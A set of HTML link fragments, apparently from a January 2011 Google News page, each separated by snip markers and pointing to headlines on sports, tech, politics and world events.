<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376180,00.asp" target="_blank" class="usg-AFQjCNEeedKNUlqWQgoNsXULz0osRTWeaQ " id="MAA4AEgPUAFgAmoCdXM">Twitter's Ad Revenue Predicted to Pass MySpace</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.emarketer.com/Article.aspx?R=1008192" target="_blank" class="usg-AFQjCNFHIkw8yyxLm5eiE9NU2pbWrOnIXQ " id="MAA4AEgPUAJgAmoCdXM">Twitter Ad Revenues to Soar This Year</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " href="http://www.reuters.com/article/idUSTRE70N5P220110124" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZO8otCjpSj5AP5vwSF4Llgt--JA " href="http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHEmKzfFERxkTqgK7-nDAlnLBvvlg " href="http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVukQYF2CS02hBDpoVNsgSl2Vhrg " href="http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0" id="MAA4AEgPUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/" class="usg-AFQjCNHIiFUxa3AEXZn1vUtKyl5UV-ph3A " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/E4wG-9FiV5eTAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/" class="usg-AFQjCNHIiFUxa3AEXZn1vUtKyl5UV-ph3A "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGDQxlf2HkP_kY_tNzY5iMi_-1RQ " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=6_dUkNdoPZI">Video: 
Raw Video: Packers Fans Rejoice in NFC Title
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl" target="_blank" class="usg-AFQjCNGQElfXImuP5gjNiO4sKtARSBFJYA " id="MAA4AEgQUAFgAmoCdXM">Roethlisberger, Rodgers look to bounce back in Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPpTk4ieUXgu-P8RRRMf8MWo7J0w " href="http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success" id="MAA4AEgQUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPrr0vkoRqaEiQt3vFQA_4L6QnyA " href="http://www.chron.com/disp/story.mpl/ap/tx/7395456.html" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJIPZyVcw6wNepnm-LyDHFaO6Clg " href="http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHhneFPmAPUa6G6iZ-Yzxn3ptkaaw " href="http://www.jsonline.com/news/milwaukee/114509574.html" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N1KK20110124" class="usg-AFQjCNEwrFmcSsRQmTv2cj4t94sEYVwECg " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/nDfXuLMkVhCuOM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N1KK20110124" class="usg-AFQjCNEwrFmcSsRQmTv2cj4t94sEYVwECg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEW9WCHK4yVIzY7YU49PFGPQMbJVA " href="http://www.nytimes.com/2011/01/25/world/middleeast/25israel.html" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3AGVHcnCKws">Video: 
Hezbollah wants national unity government
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/hezbollah-backed-candidate-lebanon-pm" target="_blank" class="usg-AFQjCNFd_sxRNnRB9acSagaGcnxPwcjqNQ " id="MAA4AEgRUAFgAmoCdXM">Hezbollah-backed candidate poised to become Lebanon PM</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGoa-0SZT-HgUkHELYIm4Qlt5QmCQ " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_2" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4eXowgPSlua1VqG8Nf0LMONQahQ " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12267758" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N4VB20110124" class="usg-AFQjCNGObH-rlW5oa-v0qUrmayFvL9u0zg " title="Reuters"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/PTWrrKWFPhkNhM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N4VB20110124" class="usg-AFQjCNGObH-rlW5oa-v0qUrmayFvL9u0zg "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG6qrigwK0jGaJWzKxvUijw-g-xcA " href="http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&campaign=rss&source=NFLHeadlines" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video: 
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/" target="_blank" class="usg-AFQjCNEl1IHYaTs16CTlgmfI4z1L2yr4yg " id="MAA4AEgSUAFgAmoCdXM">Rex Ryan: Jets have 'done a pretty good job' of beating Patriots</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHfEBCN-dtPvPOTD0kDPV0P8d3Q1Q " href="http://online.wsj.com/article/APa59ba6dc9ce0453e8a616202c7484b68.html" id="MAA4AEgSUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2AZEXbdt5AYsMtu8msDEkOt-3Fw " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFLYIutFWp_mZm9Ukmjx0jnqY1qmQ " href="http://www.ajc.com/sports/jets-qb-sanchez-optimistic-814203.html" id="MAA4AEgSUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/w_tEYbzpZ15crM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/" class="usg-AFQjCNGuYuLMS3bhVS72CPyhcq21BqLxTQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS5uJx4olbyF9osDF3gTDGuyuCPg " href="http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3i4eR4POFOw">Video: 
Detroit rape suspect to be arraigned on several assault counts.
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison" target="_blank" class="usg-AFQjCNHDjiKWPniNGy7SY6MsW0KH4Ih34Q " id="MAA4AEgTUAFgAmoCdXM">Detroit rape suspect, 31, has spent almost half his life in prison</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEalDUBH8-HQVONhcKZ4MW2d5rlSw " href="http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack" id="MAA4AEgTUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCCEQVPyyjZin-IgS-GZbKQg96lw " href="http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2" id="MAA4AEgTUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFr6r5QBoathNzT09PJwnvBUwlkuA " href="http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ " title="Computerworld"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/daFSu9xUqylQ5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ "> Computerwor... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHN9PKHYEKTa2KbqrEgQddEwTWgIw " href="http://techland.time.com/2011/01/24/motorola-xoom-tablet-tipped-for-february-17-release-at-700/" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376161,00.asp" target="_blank" class="usg-AFQjCNGKiHjC_kakoEG8A44FhwtCe2AHAg " id="MAA4AEgUUAFgAmoCdXM">Reports: Motorola Xoom to Cost About the Same as 32GB iPad</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcworld.com/businesscenter/article/217509/motorola_xoom_tablets_price_will_shoot_it_in_the_foot.html" target="_blank" class="usg-AFQjCNELXhCiOQGRPhUbTNbYaBMofmmhCA " id="MAA4AEgUUAJgAmoCdXM">Motorola Xoom Tablet's Price Will Shoot It in the Foot</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHYFaiEpBfJtoQNCxiTBsYvMlBrJg " href="http://news.cnet.com/8301-17852_3-20029268-71.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH8bZiGGhCNt2S7b-uGLUlcP2m-Bw " href="http://arstechnica.com/gadgets/news/2011/01/report-motorola-xoom-to-launch-february-17-for-around-700.ars" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGqPg2wGubRAMYVqwEuEZMwagOScw " href="http://voices.washingtonpost.com/fasterforward/2011/01/reports_xoom_release_date_is_f.html" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF67MVvZezEMdstKe1ABRVW1iIdfw " href="http://www.msnbc.msn.com/id/41220540/ns/business-motley_fool/" id="MAA4AEgUUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg " title="ABC News"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/4qo0wQiEBATaaM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://abcnews.go.com/US/wireStory?id=12742296" class="usg-AFQjCNGaSXymdf0g6zpz8vX8gCPsRxZeLg "> ABC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHD9gmMcX5UbuSNEialO4A3C839Zg " href="http://online.wsj.com/article/BT-CO-20110124-713737.html" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html" target="_blank" class="usg-AFQjCNGdoU1Lh67pcIeV49PyT7DoCZ4pRg " id="MAA4AEgVUAJgAmoCdXM">Cantor declares state bankruptcy law DOA</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFsJ-xmO_ejoSJAqbQS-S39fJbZpg " href="http://www.reuters.com/article/idUSN2419775920110124" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhzLhkbOVz53QHJ6bmW7YycCP-lA " href="http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYGF2tFrtqpMAo1sUiv4XCv4MgNA " href="http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVSFWw5bW8lOlkPcETmuGH7fJddA " href="http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html" id="MAA4AEgVUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.news.com.au/technology/apple-customer-who-downloaded-10-billionth-app-thought-prize-call-was-a-prank/story-e6frfro0-1225993161399" class="usg-AFQjCNGMNFBPkmb3N6kQ2UbPMuDb7y51TQ " title="NEWS.com.au"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/Fhq9dR-iZ4nTxM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.news.com.au/technology/apple-customer-who-downloaded-10-billionth-app-thought-prize-call-was-a-prank/story-e6frfro0-1225993161399" class="usg-AFQjCNGMNFBPkmb3N6kQ2UbPMuDb7y51TQ "> NEWS.com.au </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNE4NKmZ-bO-krcRyPLnbE7HadO1ng " href="http://technolog.msnbc.msn.com/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://news.cnet.com/8301-17852_3-20029276-71.html" target="_blank" class="usg-AFQjCNG8H2VktqAMsHReFNwIgHjafJM5Wg " id="MAA4AEgWUAFgAmoCdXM">Woman hangs up on $10000 call from Apple</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.informationweek.com/news/hardware/handheld/showArticle.jhtml?articleID=229100083&cid=RSSfeed_IWK_News" target="_blank" class="usg-AFQjCNEmx71C1yiEGag4s2BvqaGBYMUQ3w " id="MAA4AEgWUAJgAmoCdXM">What's Driving Apple's 10 Billion App Success</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGzIPukqq0qd92l2yykeeaIvVTHug " href="http://www.bbc.co.uk/go/rss/int/news/-/newsbeat/12266806" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoi6Iy8xphSHe0HBflKtTqu4IJtg " href="http://www.computerworld.com/s/article/354343/Enterprise_App_Stores_A_Good_Idea_" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF6mG8lO_xIkXBXafvs1y3RZLLzbw " href="http://www.theregister.co.uk/2011/01/24/apple_10_billionth_customer_prank_call/" id="MAA4AEgWUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHA_tLIFDLaaQzm18hZa38fC_CNWw " href="http://techland.time.com/2011/01/24/winner-of-apples-10-billionth-app-download-promo-hangs-up-on-company/" id="MAA4AEgWUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHiERdzKjGz_owcJAKwYgaq2jAmhQ " href="http://www.cnn.com/2011/WORLD/africa/01/24/winds.change/?hpt=C1" id="-9130425399277123681"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUIAy8iUF8AYKI9an-TtV9uy8Ftw " href="http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/" id="415738970037031730"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="1857102735582363016"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEK2ud_k0F8qRyqgsh-kAYgITivyQ " href="http://voices.washingtonpost.com/capitalsinsider/matt-hendricks/video-matt-hendricks-answers-y.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEYW-eOsdylgGuCJv1odl_DRoolHg " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/bill_would_allow_mcdonnell_to.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE64Ep_yxeXZUqNQV9MB1-njgF7pQ " href="http://voices.washingtonpost.com/capitalsinsider/new-york-rangers/capitals-seek-more-than-redemp.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHhWLxBM_njab00Iw569pvgKUJAJw " href="http://www.newsweek.com/blogs/the-gaggle/2011/01/24/why-no-one-will-watch-the-state-of-the-union.html" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUVFbVVUXTIHlz-l1C5dBB5sKdxg " href="http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH8qeVdzvBEnfzEKH7vE3_vwVQTqg " href="http://www.naturalnews.com/031076_USDA_bird_deaths.html" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNF2Ndq7u1NFQAEeGnztrLOHGBXwVA " href="http://online.wsj.com/article/SB10001424052748703954004576090020541379588.html" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGblh1wTgbZsSv-VYZXiNbBHiKNXw " href="http://news.nationalgeographic.com/news/2011/01/110119-yellowstone-park-supervolcano-eruption-magma-science/" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHyWl3EN4CNcBZDRvx0uWAGqRTn-w " href="http://www.bbc.co.uk/news/uk-12225163" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGGQHDo9ynACtTjJAIzBv77Y3Il_g " href="http://www.latimes.com/news/local/la-me-surfer-mavericks-20110124,0,4017331.story" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH3leUf1fO6O5B9hqaX2KdznCt2KA " href="http://www.wired.com/epicenter/2011/01/times-paywall/" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEdtmVNLHhQzK5b8i2ymGRHBdQgJw " href="http://www.nytimes.com/2011/01/23/books/review/Paul-t.html" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFqlgKE7z1GSfD-_OAHlbbllpcUzA " href="http://online.wsj.com/article/SB10001424052748703951704576092371207903438.html" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNF-_hi1BV8k2Oo3VN4qgrAvppO1bQ " href="http://www.wired.com/gadgetlab/2011/01/windows-phone-7-jailbreakers/" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHvSlpbZ6Gr6O9Sj5zjv2qb4n4b4g " href="http://www.latimes.com/news/opinion/commentary/la-oe-rodriguez-20110124,0,5860440.column" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">NBA TV Top 5: January 23rd</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Sport Science: Devin Hester Vs. A Black Bear</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/THO8bb8v_Xs/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/THO8bb8v_Xs/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=THO8bb8v_Xs">Bomb Attacks Kill 10 in Iraq Capital</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=THO8bb8v_Xs">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/uwXNpYAgahg/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/uwXNpYAgahg/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Fitness Guru Jack LaLanne Dead at 96</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/_XOgAa7BN-o/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/_XOgAa7BN-o/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=_XOgAa7BN-o">Packers Top Bears, Earn Super Bowl Berth</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=_XOgAa7BN-o">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHH_B8Vhlsac2V2jAPJyKDuyVeAAA " href="http://mashable.com/2011/01/24/engaging-facebook-fans/" id="-7258938783345423075"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2LifoZ2DaEkfGjsc9kMMPnJB2kg " href="http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml" id="-7252428281190763667"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEPdEfqF2nkQ1qDcAFFpZusUDt9tA " href="http://www.reuters.com/article/idUSTRE70N2TQ20110124" id="5335316056229417362"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNENgV2GEqlhUgEGu5EME68UcyGRvw " href="http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/" id="-6685976054251165433"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE9LKKsqu443-DV8lm4q72snzhdWw " href="http://www.nytimes.com/2011/01/24/technology/24cook.html" id="3851731467917620472"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNF0sJpX5iFReuTSkI-eJ2x5QatHcA " href="http://www.nytimes.com/2011/01/24/business/24fees.html?src=busln" id="-6745807016666702947"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFu_9RyhYijNKzwJqwfe2g-y3O7vA " href="http://www.chicagotribune.com/news/local/breaking/chibrknews-court-rules-against-emanuel-on-01242011,0,4083659.story" id="6711712754283306360"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHT_jvJT_yNF5cx8BE3V88ObIMsfQ " href="http://online.wsj.com/article/SB10001424052748704881304576094000352599050.html" id="3419897226598733059"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHe-laFgexyFrmfE7lXlS-da3UXCA " href="http://mashable.com/2011/01/20/google-offers/" id="-2235673424111835580"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsz7_xejPP6VsD3NuWdHvxda40Kg " href="http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html" id="1375770744202528156"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGLZSeleCrQ4gBas6xZiwZUPYDCYQ " href="http://www.huffingtonpost.com/2011/01/17/starbucks-new-size-trenta-graphic_n_810083.html" id="-6583013401083455589"><span class="titletext">
...[SNIP]...
